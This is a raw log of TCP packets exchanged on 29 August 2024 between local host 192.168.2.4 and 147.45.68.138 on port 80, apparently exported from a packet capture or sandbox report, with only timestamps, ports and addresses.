                                                      Aug 29, 2024 22:52:29.867705107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867713928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867717981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867722988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867754936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867891073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867902040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867913008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867913961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867925882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867954016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867969036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867989063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868000984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868005991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868012905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868022919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868031025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868046999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868083000 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868267059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868278980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868295908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868311882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868319988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868330002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868341923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868341923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868355036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868361950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868366003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868377924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868393898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868407011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868411064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868419886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868431091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868441105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868447065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868452072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868463993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868469954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868495941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868505955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868849993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868869066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868886948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868896008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868904114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868905067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868916988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868925095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868927956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868940115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868946075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868949890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.868958950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.868984938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.951908112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.951924086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.951941013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.951966047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.951982975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952069044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952080965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952090979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952100992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952111959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952116966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952124119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952133894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952142954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952155113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952164888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952168941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952177048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952187061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952194929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952198982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952208996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952229023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952250004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952567101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952610016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952697992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952708960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952718973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952729940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952737093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952742100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952753067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952760935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952774048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952806950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952820063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952841043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952858925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952863932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952871084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952876091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952888012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952898979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952898979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952908993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952930927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.952970028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952980995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.952991009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953007936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953010082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953023911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953048944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953059912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953077078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953087091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953099012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953099012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953108072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953128099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953135014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953141928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953150034 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953169107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953197002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953216076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953227997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953238010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953248978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953253984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953260899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953262091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953277111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953283072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953294992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953303099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953315020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.953330040 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.953353882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954093933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954104900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954114914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954125881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954139948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954149961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954161882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954165936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954174995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954183102 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954185963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954197884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954205036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954209089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954229116 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954240084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954243898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954252958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954262972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954267025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954274893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954286098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954296112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954298973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954319000 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954322100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954332113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954335928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954346895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954360008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954369068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954371929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954381943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954382896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954397917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954405069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954411983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954420090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954428911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954438925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954442024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954463959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954468966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954485893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954495907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954497099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954497099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954508066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954519033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954529047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954530954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954551935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954585075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954596043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954606056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954615116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954632044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954632044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954644918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954652071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954660892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954663038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954675913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954685926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954698086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954699993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954709053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954714060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954725981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954731941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954740047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954746008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954756975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954762936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954767942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954778910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954778910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954790115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954797983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954816103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954818964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954830885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954838037 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954842091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954852104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954853058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954864979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954874992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954874992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954886913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.954904079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.954924107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955141068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955153942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955164909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955180883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955193043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955209970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955220938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955229998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955246925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955282927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955293894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955306053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955316067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955327034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955332041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955339909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955351114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955352068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955374002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955377102 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955384970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955391884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955418110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955689907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955701113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955710888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955729008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955751896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955770969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955781937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955791950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955802917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.955812931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.955840111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038611889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038671017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038671017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038702011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038736105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038736105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038748980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038758993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038769007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038769007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038769007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038780928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038791895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038804054 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038825989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038836002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038836956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038851976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038862944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038877964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038880110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038896084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038896084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038902044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038913012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.038928032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.038954973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039318085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039362907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039446115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039455891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039465904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039475918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039486885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039488077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039496899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039499044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039511919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039519072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039545059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039561987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039736032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039758921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039768934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039799929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039886951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039896011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039905071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039915085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039915085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039916039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039948940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.039959908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039972067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039980888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039990902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.039998055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040023088 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040038109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040079117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040091038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040100098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040117979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040126085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040128946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040141106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040144920 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040152073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040163040 CEST8049739147.45.68.138192.168.2.4
